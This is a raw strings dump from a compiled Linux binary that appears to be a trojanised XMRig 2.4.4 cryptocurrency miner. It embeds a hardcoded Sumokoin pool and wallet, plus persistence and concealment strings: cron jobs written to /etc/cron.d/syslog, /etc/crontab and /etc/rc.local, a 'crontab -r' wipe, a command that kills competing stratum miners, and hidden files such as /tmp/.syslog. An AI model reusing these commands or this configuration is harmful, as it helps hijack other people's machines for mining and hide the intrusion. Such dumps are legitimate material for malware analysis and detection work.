ATUSH
I+D$(I
D$(H
[]A\A]
L$KH
USHc
JUSH
Hc?HcS
ATUI
x L9
H9D$ u
H9D$(
[]A\
w |6Hc?
AUATL
H+}(H
Z[]A\A]
AWAVE1
AUATI
H;=+_"
[]A\A]A^A_
AUATUSH
uJE1
	v"H
	w;L9
[]A\A]
[]A\A]
AWAVI
AUATUSH
L$<D
D$ D
[]A\A]A^A_
D$@E
D$pI
*D$ 
D$ H
t$@L
v(=	
tKHc
D+|$<D;|$`H
|$`@
*D$ 
+l$`
T$dD)
l$`H
l$ r
*D$ 
T$ H
,$D)
AWAVI
AUATUS
h[]A\A]A^A_
D$0C
D$0N
|$ L
0u5I
]A\A]A^A_
t$ D
t$ D
0u'I
t$PA
|$ L
Degas are we not drawn onward no In union drawn onward to new eras aged
L$XH
t$HD
T$DD
L$@D
L$XH
t$HD
T$DD
L$@D
D$PE
|$PH
H;\$0
C H)
L$ D)
D$ D
L$<D
L$<H9
L$ D
L$ D
AWAVAUATUSH
u)E1
[]A\A]A^A_
v,Mc
]A\A]A^A_
t?E1
/proc/se
lf/ff
t	H;
AWAV1
AUAT1
otJH
([]A\A]A^A_
sofA
u%dH
v	H9
v	H9
 vXH
T$ f%
l$ H
<$u8
l$ H
|$0Y^
l$ H
2w}I
AUATMc
tDI9
[]A\A]A^
AWAVH
AUATUSH
[]A\A]A^A_
AVAUA
ATUH
|$ H
[]A\A]A^
AWAVM
AUATI
|$<M
D$,H
D$TE
HcL$DI
6HcT$HHcD$THc|$XD
D$LD
L$PH
HcD$\
|$(1
D;D$
[]A\A]A^A_
AVAUI
ATUH
[]A\A]A^
AWAVM
AUATI
\$ H
D$(H
[]A\A]A^A_
AWAV1
AUAT
uZIcx
OIcx
x$Icp
AWAVI
AUAT
T$@H
t$(1
D$(H
L$8H
|$8H
t$$1
t$@1
|$ 1
[]A\A]A^A_
ATUA
[]A\
?w	H
ATUSdH
[]A\
S(H;S s,
u"Hc
AVAUI
ATUL
[]A\A]A^
AWAV
AUATI
~UH9
[]A\A]A^A_
C8H9C(w+H
[]A\
Hit$
ATUI
H+D$
4$H+t$
&^_u"H
 []A\
AUATI
([]A\A]
ATUSH
P[]A\
AVAUI
ATU1
[]A\A]A^
ATUH
[]A\H
8:u'H
8<u?H
AWAVAUATUSH
[]A\H
A]A^A_
AUAT
8:u=H
|$0L
C,uJH
[]A\A]
AWAVAUATA
D$(I
L+|$
A8\9
A8\1
T$ H
T$ H
[]A\A]A^A_
tFH9
t=H9
[]A\
~w0H
~w]H
$[]A\
AUAT
T$ H
T$(H
D$ 1
8[]A\A]
AVAUATUI
>:u	
;:u.
[]A\A]A^
C8H9C(v
G8H9G(v
AWAVI
AUATE1
D$(H
T$ L
D$(u"I
D$ L
uQI;^
[]A\A]A^A_
t$01
D$0H
t3UH
pool
uptime
ping
failures
error_log
connection
highest
threads
hashrate
worker_id
brand
sockets
2.4.4
version
kind
algo
hugepages
donate_level
diff_current
shares_good
shares_total
avg_time
hashes_total
best
results
uuuuuuuubtnufruuuuuuuuuuuuuuuuuu
0123456789ABCDEF
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
-;eU
U1(\Q
mSx@
b}$l
~)p$w
11eU%
z^KD
u@SIGHUP received, exiting
SIGTERM received, exiting
SIGINT received, exiting
paused, press 'r' to resume
[01;32mresumed
Ctrl+C received, exiting
"%s" hash self-test failed.
[01;33mpaused
[0m, press 
[01;35mr
[0m to resume
[31m
[33m
[01;37m
[90m
[%d-%02d-%02d %02d:%02d:%02d]%s %s%s
[%d-%02d-%02d %02d:%02d:%02d] 
{"id":%ld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}
[%s:%u] duplicate job received, reconnect
[%s:%u] getaddrinfo error: "%s"
[%s:%u] unsupported method: "%s"
[%s:%u] DNS error: "No IPv4 records found"
{"id":%lu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}
[%s:%u] JSON decode failed: "%s"
The document root must not be followed by other values.
Missing a name for object member.
Missing a colon after a name of object member.
Missing a comma or '}' after an object member.
Missing a comma or ']' after an array element.
Incorrect hex digit after \u escape in string.
The surrogate pair in string is invalid.
Invalid escape character in string.
Missing a closing quotation mark in string.
Number too big to be stored in double.
Terminate parsing due to Handler error.
job_id
blob
target
Unauthenticated
your IP is banned
IP Address currently banned
code
message
[%s:%u] error: "%s", code: %d
[%s:%u] login error code: %d
[%s:%u] DNS error: "%s"
jsonrpc
login
method
params
[%s:%u] connect error: "%s"
Unknown error.
result
[%s:%u] read error: "%s"
No error.
The document is empty.
Invalid value.
Invalid encoding in string.
Miss fraction part in number.
Miss exponent in number.
Unspecific syntax error.
vH7B
W4vC
9Y>)F$
raB3G
)c=H
]rHa
O8Mr
bnMG
[*QmU
mr"iR
R$N(
-sSO\
T%L9
hGT.
B}T}
=@[V
!a9X
X5AHx
%4xY
Z~$|7
+\0I
2a\|
\ysK
|M$D
pH_r
(:W"
s\ax}?
pc2g
@BXV
tC7Ddx
EydV
eax~Z
ekhHD
@iZb
k0V(
k*do^
:V!2m
RJqn
bzo=
$qE}
XqkY
quAt
Jugm
~B v
STv/N
_w&2
xg^Jp5|
yMzw
;	Fzo
{zel#|67
P/};
[@JO
nQ:B
[01;37muse pool 
[01;36m%s:%d 
[01;30m%s
[01;31mrejected
[0m (%ld/%ld) diff 
[01;37m%u
[0m 
[31m"%s"
[0m 
[01;30m(%lu ms)
rejected (%ld/%ld) diff %u "%s" (%lu ms)
[01;32maccepted
[0m (%ld/%ld) diff 
[01;37m%u
[0m 
[01;30m(%lu ms)
accepted (%ld/%ld) diff %u (%lu ms)
[01;35mnew job
[0m from 
[01;37m%s:%d
[0m diff 
[01;37m%d
use pool %s:%d %s
dev donate started
dev donate finished
no active pools, stop mining
new job from %s:%d diff %d
fee.xmrig.com
stratum+tcp://
.nicehash.com
.minergate.com
cryptonight
 %d.%d.%d
 features: x86_64 AES-NI
libuv/%s
%s:%d: %s
pools
user
userpass
keepalive
nicehash
background
colors
cpu-affinity
cpu-priority
donate-level
log-file
max-cpu-usage
print-time
retries
retry-pause
user-agent
config
help
no-color
no-huge-pages
api-port
api-access-token
api-worker-id
Try "xmrig" --help' for more information.
XMRig 2.4.4
 built on Jan 13 2018 with GCC
{"algo": "cryptonight", "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 1,    "log-file": null, "max-cpu-usage": 100, "print-time": 60,"retries": 5,"retry-pause": 5,"safe": false,"syslog": false,"threads": null, "pools":[{        "url": "pool.sumokoin.hashvault.pro:80", "user": "Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",        "pass": "x","keepalive": true,"nicehash": false}]}
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
a:c:khBp:Px:r:R:s:t:T:o:u:O:v:Vl:S
[01;32m * 
[01;37mVERSIONS:     
[01;36mXMRig/%s
[01;37m libuv/%s%s
 * VERSIONS:     XMRig/%s libuv/%s%s
[01;32m * 
[01;37mTHREADS:      
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
 * THREADS:      %d, %s, av=%d, %sdonate=%d%%%s
[01;32m * 
[01;37mHUGE PAGES:   %s, %s
[01;32m * 
[01;37mCPU:          %s (%d) %sx64 %sAES-NI
[01;32m * 
[01;37mCPU L2/L3:    %.1f MB/%.1f MB
 * CPU:          %s (%d) %sx64 %sAES-NI
 * CPU L2/L3:    %.1f MB/%.1f MB
[01;32m * 
[01;37mPOOL #%d:      
[01;36m%s:%d
[01;32m * 
[01;37mCOMMANDS:     
[01;35mh
[01;37mashrate, 
[01;35mp
[01;37mause, 
[01;35mr
[01;37mesume
 * COMMANDS:     'h' hashrate, 'p' pause, 'r' resume
[01;32menabled
[01;31mdisabled
[01;32mavailable
[01;31munavailable
[01;32m
[01;31m-
[01;31m
 gcc/%d.%d.%d
 * HUGE PAGES:   %s, %s
, affinity=0x%lX
 * POOL #%d:      %s:%d
%03.1f
[01;37mspeed
[0m 2.5s/60s/15m 
[01;36m%s 
[22;36m%s %s 
[01;36mH/s
[0m max: 
[01;36m%s H/s
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
MbP?
/etc/cron.d/syslog
0 */6 * * * root 
/etc/crontab
%s%s
/etc/rc.local
exit 0
crontab -r > /dev/null 2>&1
/proc/self/exe
(echo "0 */6 * * * %s") | crontab - >/dev/null 2>&1
ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dsetsid() failed (errno = %d)
chdir() failed (errno = %d)
madvise failed
XMRig
%s/%s (Linux 
x86_64) libuv/%s
_E`%
\hQV
Sb*kA?AT?*
0Hx(x`(07
$~Z6ZH6$
tX4Fr.rh.46Aw-wl-6
%Ku>
cw/X
cB pP0P@0 
&y_5_L5&
.eK9K\9.
2O}+}d+2
k(lD<DP<(
r\8Tl$lp$8W_
Ws!R
>]c!c|!>
B|q&W
:Si'it':'
+"wU3UD3"
-<Zf"fx"<
m,bN:NX:,
!(Ew
p09Y
6666666666666666\\\\\\\\\\\\\\\\
E~Dl
0/*g
)5CN
@T z
p_i7
$1J^
5;6Q
kgyA
~	L#'Q&
k<VL
XX&~
0t*Q
N^ee
1p.D
0xGNe
Mf3L
<$;nq
TZFx
)l\^'-
2_{6n
`j?J
c|w{
9JLX
~=d]
T`00P
V++}
L&&jl66Z~??A
Oh44\Q
sb11S*
RF##e
&N''i
X,,t4
v;;M
R)){
>^//q
,@  `
r99K
f33U
x<<D%
p88H
uB!!c 
z==G
D""fT**~;
;d22Vt::N
H$$l
Cn77Y
J%%o\..r8
|>>Bq
j55_
P((x
Z--w
P`00
gg}V++
jL&&Zl66A~??
\h44
Sb11?*
eF##^
iN''
tX,,.4
RRMv;;a
{R))>
q^//
`@  
Kr99
MMUf33
PPDx<<
Hp88
cB!!0 
DD9.
~~Gz==
]]+2
fD""~T**
Vd22Nt::
lH$$
Yn77
xxoJ%%r\..$8
tt!>
ppB|>>
aa_j55
UUxP((z
wZ--
0P`0
g+}V+
&jL&6Zl6?A~?
4\h4
1Sb1
#eF#
'iN'
,tX,
R;Mv;
){R)
/q^/
 `@ 
9Kr9J
M3Uf3
P<Dx<
8Hp8
!cB!
~=Gz=d
"fD"*~T*
2Vd2:Nt:
$lH$\
7Yn7m
x%oJ%.r\.
p>B|>
a5_j5W
U(xP(
-wZ-
00P`
++}V
=&&jL66Zl??A~
44\h
11Sb
##eF
''iN
,,tX
-6nn
;;Mv
})){R
//q^
  `@
g99KrJJ
33Uf
<<Dx
!88Hp
!!cB
==Gzdd
+2ss
""fD**~T
22Vd::Nt
$$lH\\
77Ynmm
%%oJ..r\
!>KK
>>B|
55_jWW
3"ii
((xP
)--wZ
:,xmrig
<unknown>
[%c%c%c] %-8s %p
Unknown system error
Unknown system error %d
E2BIG
EACCES
EADDRINUSE
EADDRNOTAVAIL
EAFNOSUPPORT
EAGAIN
EAI_ADDRFAMILY
EAI_AGAIN
EAI_BADFLAGS
EAI_BADHINTS
EAI_CANCELED
EAI_FAIL
EAI_FAMILY
EAI_MEMORY
EAI_NODATA
EAI_NONAME
EAI_OVERFLOW
EAI_PROTOCOL
EAI_SERVICE
EAI_SOCKTYPE
EALREADY
EBADF
EBUSY
ECANCELED
ECHARSET
ECONNABORTED
ECONNREFUSED
ECONNRESET
EDESTADDRREQ
EEXIST
EFAULT
EFBIG
EHOSTUNREACH
EINTR
EINVAL
EISCONN
EISDIR
ELOOP
EMFILE
EMSGSIZE
ENAMETOOLONG
ENETDOWN
ENETUNREACH
ENFILE
ENOBUFS
ENODEV
ENOENT
ENOMEM
ENONET
ENOPROTOOPT
ENOSPC
ENOSYS
ENOTCONN
ENOTDIR
ENOTEMPTY
ENOTSOCK
ENOTSUP
EPERM
EPIPE
EPROTO
EPROTONOSUPPORT
EPROTOTYPE
ERANGE
EROFS
ESHUTDOWN
ESPIPE
ESRCH
ETIMEDOUT
ETXTBSY
EXDEV
UNKNOWN
ENXIO
EMLINK
EHOSTDOWN
EREMOTEIO
ENOTTY
argument list too long
permission denied
address already in use
address not available
address family not supported
temporary failure
bad ai_flags value
invalid value for hints
request canceled
permanent failure
ai_family not supported
out of memory
no address
unknown node or service
argument buffer overflow
resolved protocol is unknown
socket type not supported
bad file descriptor
resource busy or locked
operation canceled
invalid Unicode character
connection refused
connection reset by peer
destination address required
file already exists
file too large
host is unreachable
interrupted system call
invalid argument
i/o error
socket is already connected
too many open files
message too long
name too long
network is down
network is unreachable
file table overflow
no buffer space available
no such device
no such file or directory
not enough memory
machine is not on the network
protocol not available
no space left on device
function not implemented
socket is not connected
not a directory
directory not empty
operation not permitted
broken pipe
protocol error
protocol not supported
result too large
read-only file system
invalid seek
no such process
connection timed out
text file is busy
unknown error
end of file
no such device or address
too many links
host is down
remote I/O error
src/uv-common.c
err == 0
async
check
fs_event
fs_poll
handle
idle
prepare
timer
signal
resource temporarily unavailable
service not available for socket type
connection already in progress
software caused connection abort
bad address in system call argument
illegal operation on a directory
too many symbolic links encountered
socket operation on non-socket
operation not supported on socket
protocol wrong type for socket
cannot send after transport endpoint shutdown
cross-device link not permitted
inappropriate ioctl for device
uv_loop_delete
1.18.1-dev
src/unix/async.c
w == &loop->async_io_watcher
/proc/self/fd/%d
uv__async_io
src/unix/core.c
fd > STDERR_FILENO
handle->flags & UV_CLOSING
!(handle->flags & UV_CLOSED)
!uv__is_closing(handle)
fd > -1
sockfd >= 0
fd >= -1
0 != events
w->fd >= 0
w->fd < INT_MAX
loop->watchers[w->fd] == w
loop->nfds > 0
/tmp
TMPDIR
TEMP
TEMPDIR
HOME
uv__io_active
uv__io_stop
uv__io_start
uv__io_init
uv__close
uv__close_nocheckstdio
uv__accept
uv__finish_close
uv__make_close_pending
uv_close
0 == (events & ~(POLLIN | POLLOUT | UV__POLLRDHUP | UV__POLLPRI))
src/unix/fs.c
req->result == 0
uv__has_active_reqs(req->loop)
uv_fs_copyfile
uv_fs_write
uv_fs_utime
uv_fs_unlink
uv_fs_symlink
uv_fs_stat
uv_fs_rmdir
uv_fs_rename
uv_fs_realpath
uv_fs_readlink
uv_fs_scandir
uv_fs_read
uv_fs_open
uv_fs_mkdtemp
uv_fs_mkdir
uv_fs_link
uv_fs_lstat
uv_fs_chown
uv_fs_chmod
uv__fs_done
uv_fs_access
Csrc/unix/getaddrinfo.c
req->retcode == 0
!"unknown EAI_* error code"
uv__getaddrinfo_done
uv__getaddrinfo_translate_error
src/unix/loop.c
!uv__has_active_reqs(loop)
QUEUE_EMPTY(&loop->wq) && "thread pool work queue not empty!"
uv__loop_close
src/unix/poll.c
(pevents & ~(UV_READABLE | UV_WRITABLE | UV_DISCONNECT | UV_PRIORITIZED)) == 0
uv_poll_start
uv_poll_stop
src/unix/process.c
signum == SIGCHLD
QUEUE_EMPTY(&pending)
n == sizeof(val)
options->file != NULL
0 && "Unexpected flags"
/dev/null
err == pid
!(options->flags & ~(UV_PROCESS_DETACHED | UV_PROCESS_SETGID | UV_PROCESS_SETUID | UV_PROCESS_WINDOWS_HIDE | UV_PROCESS_WINDOWS_VERBATIM_ARGUMENTS))
container->data.stream != NULL
uv__write_int
uv__process_init_stdio
uv__chld
uv_spawn
src/unix/signal.c
ret == 0
!(handle->flags & UV_CLOSING)
r == sizeof msg || (r == -1 && (errno == EAGAIN || errno == EWOULDBLOCK))
uv_signal_stop
uv__signal_start
uv__signal_handler
uv__signal_stop
uv__signal_event
src/unix/stream.c
uv__stream_fd(stream) >= 0
req->handle == stream
fd_to_send >= 0
req->write_index < req->nbufs
n == 0
n == 0 || n == -1
stream->alloc_cb != NULL
req->bufs != NULL
!(stream->flags & UV_CLOSING)
stream->shutdown_req
stream->flags & UV_CLOSED
stream->write_queue_size == 0
events & POLLIN
stream->accepted_fd == -1
server->loop == client->loop
queued_fds->offset > 0
nbufs > 0
alloc_cb
stream->write_queue_size >= len
!(stream->flags & UV_STREAM_BLOCKING)
ignoring non-SCM_RIGHTS ancillary data: %d
start + CMSG_LEN(count * sizeof(*pi)) == end
req->handle->write_queue_size >= size
uv__has_active_reqs(stream->loop)
stream->type == UV_TCP || stream->type == UV_NAMED_PIPE || stream->type == UV_TTY
stream->type == UV_TCP || stream->type == UV_NAMED_PIPE
!uv__io_active(&stream->io_watcher, POLLIN | POLLOUT)
stream->type == UV_TCP || stream->type == UV_TTY || stream->type == UV_NAMED_PIPE
(stream->type == UV_TCP || stream->type == UV_NAMED_PIPE || stream->type == UV_TTY) && "uv_write (unix) does not yet support other types of streams"
!uv__io_active(&handle->io_watcher, POLLIN | POLLOUT)
uv__stream_close
uv_read_start
uv_try_write
uv_write2
uv_shutdown
uv_accept
uv__server_io
uv__stream_destroy
uv__stream_open
uv__drain
uv__write_req_size
uv__write_callbacks
uv__write
uv__stream_recv_cmsg
uv__read
uv__stream_connect
uv__stream_io
src/unix/tcp.c
handle->type == UV_TCP
UV_TCP_SINGLE_ACCEPT
uv__tcp_connect
src/unix/udp.c
req != NULL
handle->type == UV_UDP
handle->recv_cb != NULL
handle->alloc_cb != NULL
handle->io_watcher.fd == -1
handle->send_queue_size == 0
handle->send_queue_count == 0
addrlen <= sizeof(req->addr)
!(handle->flags & UV_UDP_PROCESSING)
uv__has_active_reqs(handle->loop)
0 && "unsupported address family"
0 && "unexpected address family"
uv_udp_set_multicast_interface
uv__udp_recvmsg
uv__udp_io
uv__udp_try_send
uv__udp_sendmsg
uv__udp_maybe_deferred_bind
uv__udp_send
uv__udp_run_completed
uv__udp_finish_close
/proc/cpuinfo
src/unix/linux-core.c
clock_ticks != 0
cpu%u 
r == 1
%lu %lu %lu %lu %lu %lu
num == numcpus
loop->watchers != NULL
w->pevents != 0
w->fd < (int) loop->nwatchers
op == UV__EPOLL_CTL_ADD
timeout >= -1
timeout != -1
timeout > 0
/proc/self/stat
/proc/stat
clock_ticks != (unsigned long) -1
/sys/devices/system/cpu/cpu%u/cpufreq/scaling_cur_freq
QUEUE_EMPTY(&loop->watcher_queue)
no_epoll_wait == 0 || no_epoll_pwait == 0
(unsigned) fd < loop->nwatchers
read_times
cpu MHz		: 
model name	: 
uv__io_poll
uv__platform_invalidate_fd
src/unix/linux-inotify.c
size > 0
w != NULL
tmp_path != NULL
errno == EAGAIN || errno == EWOULDBLOCK
uv_fs_event_stop
uv__inotify_read
uv__inotify_fork
src/fs-poll.c
ctx->parent_handle != NULL
ctx != NULL
ctx->parent_handle->poll_ctx == ctx
uv_fs_poll_getpath
uv_fs_poll_stop
timer_cb
0123456789ABCDEF
0123456789abcdef
0123456789
%u.%u.%u.%u
UV_THREADPOOL_SIZE
src/threadpool.c
uv__queue_done
0.4.0
GenuineIntel
AuthenticAMD
CyrixInstead
NexGenDriven
GenuineTMx86
UMC UMC UMC 
CentaurHauls
RiseRiseRise
SiS SiS SiS 
Geode by NSC
OPTERON_800
PHENOM
PHENOM2
FUSION_C
FUSION_E
FUSION_EA
FUSION_Z
FUSION_A
Core(TM) [im][357]
W35##
[ELXW]75##
[ELXW]55##
[ELXW]56##
Pentium(R) M
Pentium(R) Dual  CPU
Pentium(R) Dual-Core
Pentium(R) D
Genuine Intel(R) CPU
Intel(R) Core(TM)
CPU [N ][23]## 
CPU Z
CPU [ND][45]## 
CPU [ND]#### 
Xeon
Atom(TM) CPU
Mobile
Celeron
Pentium
PENTIUM
IRWIN
POTOMAC
GAINESTOWN
WESTMERE
PENTIUM_M
NOT_CELERON
MOBILE_CORE_SOLO
MOBILE_CORE_DUO
WOLFDALE
MEROM
PENRYN
QUAD_CORE
DUAL_CORE_HT
QUAD_CORE_HT
MORE_THAN_QUADCORE
PENTIUM_D
SILVERTHORNE
DIAMONDVILLE
PINEVIEW
CEDARVIEW
__gnu_cxx::__concurrence_lock_error
__gnu_cxx::__concurrence_unlock_error
N9__gnu_cxx24__concurrence_lock_errorE
N9__gnu_cxx26__concurrence_unlock_errorE
pure virtual method called
deleted virtual method called
std::bad_alloc
St9bad_alloc
std::exception
std::bad_exception
St9exception
St13bad_exception
N10__cxxabiv115__forced_unwindE
N10__cxxabiv119__foreign_exceptionE
std::bad_typeid
St10bad_typeid
N10__cxxabiv120__si_class_type_infoE
St9type_info
terminate called recursively
  what():  
terminate called after throwing an instance of '
terminate called without an active exception
std::bad_cast
St8bad_cast
N10__cxxabiv117__class_type_infoE
St11logic_error
St12domain_error
St16invalid_argument
St12length_error
St12out_of_range
St13runtime_error
St11range_error
St14overflow_error
St15underflow_error
0123456789
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs%s: __pos (which is %zu) > this->size() (which is %zu)
basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
basic_string::copy
basic_string::compare
basic_string::_S_create
basic_string::erase
basic_string::_M_replace_aux
basic_string::insert
basic_string::replace
basic_string::assign
basic_string::append
basic_string::resize
basic_string::_S_construct null not valid
basic_string::basic_string
basic_string::substr
/dev/urandom
default
/dev/random
random_device::random_device(const std::string&)
mt19937
(anonymous namespace)
string literal
auto
decltype(auto)
[abi:
{default arg#
JArray
auto:
VTT for 
construction vtable for 
-in-
typeinfo for 
typeinfo name for 
typeinfo fn for 
non-virtual thunk to 
covariant return thunk to 
java Class for 
guard variable for 
TLS init function for 
TLS wrapper function for 
reference temporary #
hidden alias for 
non-transaction clone for 
_Sat 
_Accum
_Fract
operator
operator 
new 
false
true
java resource 
decltype (
this
{parm#
global constructors keyed to 
global destructors keyed to 
{lambda(
{unnamed type#
 [clone 
 restrict
 volatile
 const
 transaction_safe
 noexcept
 throw
complex 
imaginary 
 __vector(
(...
...)
_GLOBAL_
std::allocator
std::basic_string
std::string
std::istream
basic_istream
std::ostream
basic_ostream
std::iostream
basic_iostream
alignof 
const_cast
delete[] 
dynamic_cast
delete 
operator"" 
new[]
reinterpret_cast
sizeof...
static_cast
sizeof 
throw 
bool
boolean
byte
long double
float
__float128
unsigned char
unsigned int
unsigned
unsigned long
unsigned __int128
unsigned short
void
wchar_t
unsigned long long
decimal32
decimal64
decimal128
half
char16_t
char32_t
decltype(nullptr)
std::basic_string<char, std::char_traits<char>, std::allocator<char> >
std::basic_istream<char, std::char_traits<char> >
std::basic_ostream<char, std::char_traits<char> >
std::basic_iostream<char, std::char_traits<char> >
basic_string::_M_construct null not valid
basic_string::_M_create
basic_string::_M_replace
string::string
Assertion failed: %s (%s: %s: %d)
 !"#$$%%&&''(((())))****++++,,,,,,,,--------........////////: unrecognized option: 
: option requires an argument: 
: option is ambiguous: 
: option does not take an argument: 
%b %e %T
<%d>%s %n%s%s%.0d%s: 
/dev/console
%.*s
/dev/log
/etc/hosts
/etc/services
/udp
/tcp
/etc/resolv.conf
127.0.0.1
options
ndots:
attempts:
timeout:
nameserver
domain
search
/usr/local/bin:/bin:/usr/bin
PATH
/bin/sh
-0X+0X 0X-0x+0x 0x
-+   0X0x
(null)
0123456789ABCDEF
M(knN
XXXXXX
__vdso_clock_gettime
LINUX_2.6
%m/%d/%y
%Y-%m-%d
%H:%M
%H:%M:%S
+%lld
%+.2d%.2d
%0*lld
Illegal byte sequence
Domain error
Result not representable
Not a tty
Permission denied
Operation not permitted
No such file or directory
No such process
File exists
Value too large for data type
No space left on device
Out of memory
Resource busy
Interrupted system call
Resource temporarily unavailable
Invalid seek
Cross-device link
Read-only file system
Directory not empty
Connection reset by peer
Operation timed out
Connection refused
Host is down
Host is unreachable
Address in use
Broken pipe
I/O error
No such device or address
Block device required
No such device
Not a directory
Is a directory
Text file busy
Exec format error
Invalid argument
Argument list too long
Symbolic link loop
Filename too long
Too many open files in system
No file descriptors available
Bad file descriptor
No child process
Bad address
File too large
Too many links
No locks available
Resource deadlock would occur
State not recoverable
Previous owner died
Operation canceled
Function not implemented
No message of desired type
Identifier removed
Device not a stream
No data available
Device timeout
Out of streams resources
Link has been severed
Protocol error
Bad message
File descriptor in bad state
Not a socket
Destination address required
Message too large
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Not supported
Protocol family not supported
Address family not supported by protocol
Address not available
Network is down
Network unreachable
Connection reset by network
Connection aborted
No buffer space available
Socket is connected
Socket not connected
Cannot send after socket shutdown
Operation already in progress
Operation in progress
Stale file handle
Remote I/O error
Quota exceeded
No medium found
God A red nugget A fat egg under a dog
Wrong medium type
No error information
'hnopqb 
}&*+<=>?CGJMXYZ[\]^_`acdefgijklrstyz{|
 !"#
 !"#
UTF-8
ASCII
^[yY]
^[nN]
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
%a %b %e %T %Y
%m/%d/%y
%H:%M:%S
%I:%M:%S %p
%m/%d/%y
0123456789
%a %b %e %T %Y
%H:%M:%S
/etc/passwd
/var/run/nscd/socket
/proc/self/task
/etc/localtime
TZif
/usr/share/zoneinfo/
/share/zoneinfo/
/etc/zoneinfo/
/tmp/.syslog
/bin/.syslog
/tmp/.syspid
.shstrtab
.init
.text
.fini
.rodata
.gcc_except_table
.tbss
.init_array
.fini_array
.ctors
alula
.dtors
.data.rel.ro
.got
.data
.bss
